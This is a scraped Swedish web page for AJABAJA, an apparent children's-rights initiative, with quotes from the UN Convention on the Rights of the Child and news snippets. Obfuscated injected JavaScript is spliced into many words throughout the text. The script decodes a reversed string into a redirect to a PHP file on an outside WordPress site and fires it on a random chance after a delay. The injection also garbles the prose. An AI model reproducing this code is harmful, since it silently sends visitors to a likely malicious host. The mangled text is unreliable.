AJABAJA gör skillnad för barnen

Barnen utgör ca 15% av befolkningen i Sverige och 100 % av vår framtid!

Alldeles för många barn är utsatta för…
Kränkandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling och diskriminering

– Alla barn har samma rättigheter och lika värde.
Ingen får diskrimineras.¹

– Barnets bästa ska komma i främsta rummet vid
alla beslut som rör barn.¹

– Varje barn har rätt att överleva och utvecklas.¹

– Varje barn har rätt att uttrycka sin mening och
höras i alla frågor som rör henne/honom.
Barnets åsikt ska beaktas i förhållandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande till
barnets ålder och mognad.¹


¹ – artiklarna 2,3,6 och 12 i Barnkonventionen
Här kan du läsa vad FN:s Barnkonvention säger!

Vad tycker våra användare

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andare” number=”100″ order_by=”random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and” author_text_font_weight=”300″ show_navigation=”yes” navigation_style=”dark” auto_rotate_slides=”3″ animation_type=”fade_option” text_font_size=”19″ text_color=”#0a0a0a”]

Nyheter

Filmen om AJABAJA

Idag lanserar vi vår nya film om AJABAJA som vänder sig till företag och organisationer som vill ha en tydlig riktning i ert sociala hållbarhetsarbete. Som partner till oss bidrar du till barns hälsa och välmående. AJABAJA ökar kunskapen om kränkandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande behandom()......

You cannot get through a single day without having an impact on the world around you. What you do makes a difference, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and you have to decide what kind of difference you want to make. – Jane......

Barnkonventionen

BARNKONVENTIONEN FN:s konvention om barnets rättigheter, eller barnkonventionen som den också kallas, innehåller bestämmelser om mänskliga rättigheter för barn. I barnkonventionens artikel 45 finns inskrivet att det är UNICEFs uppgift att kämpa för att barnkonventionen efterlevs. Det här uppdraget är vi mycket stolta över. Vi......